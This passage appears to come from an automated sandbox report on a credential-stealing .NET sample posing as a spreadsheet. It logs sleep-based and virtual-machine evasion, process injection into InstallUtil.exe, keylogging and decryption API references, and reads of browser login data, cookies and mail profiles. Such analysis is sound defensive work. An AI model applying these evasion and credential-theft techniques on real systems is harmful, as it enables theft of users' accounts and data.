                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2A10000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2830000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory allocated: AB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory allocated: 2730000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory allocated: 2530000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2B60000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2DA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2CE0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_05B13134 rdtsc 0_2_05B13134
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 8340
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 1512
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 3236
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 6600
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 4487
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 5352
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952 Thread sleep count: 32 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952 Thread sleep time: -29514790517935264s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952 Thread sleep time: -600000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1532 Thread sleep count: 8340 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952 Thread sleep time: -599875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952 Thread sleep time: -599765s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 1532 Thread sleep count: 1512 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596578s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596468s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596359s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596250s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596140s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -596031s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -595896s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -595771s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -595640s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -595358s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -595203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -595093s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594547s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4952Thread sleep time: -594219s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594999Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593844Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599842
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599731
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597334
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596932
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596755
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596617
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596500
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596391
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596060
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595701
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595031
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594922
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594812
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594683
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594568
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594325
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594093
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593983
                    Source: Tojeiuai.exe, 00000006.00000002.2251979049.0000000002799000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: Tojeiuai.exe, 00000006.00000002.2251979049.0000000002799000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                    Source: InstallUtil.exe, 00000007.00000002.4491737146.0000000000EB4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
                    Source: InstallUtil.exe, 00000004.00000002.4492707739.0000000000B96000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllultu
                    Source: InstallUtil.exe, 00000002.00000002.4492554655.0000000000E89000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllWP
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 0_2_05B13134 rdtsc 0_2_05B13134
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 2_2_06449548 LdrInitializeThunk,LdrInitializeThunk,2_2_06449548
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, COVID19.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.43d48e0.5.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.5b60000.11.raw.unpack, NativeMethods.cs Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 9E5008
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 95D008
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 446000
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D44008
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe VolumeInformation
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Queries volume information: C:\Users\user\AppData\Roaming\Tojeiuai.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeQueries volume information: C:\Users\user\AppData\Roaming\Tojeiuai.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Tojeiuai.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                    Remote Access Functionality

                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 13 System Information Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 211 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 211 Security Software Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
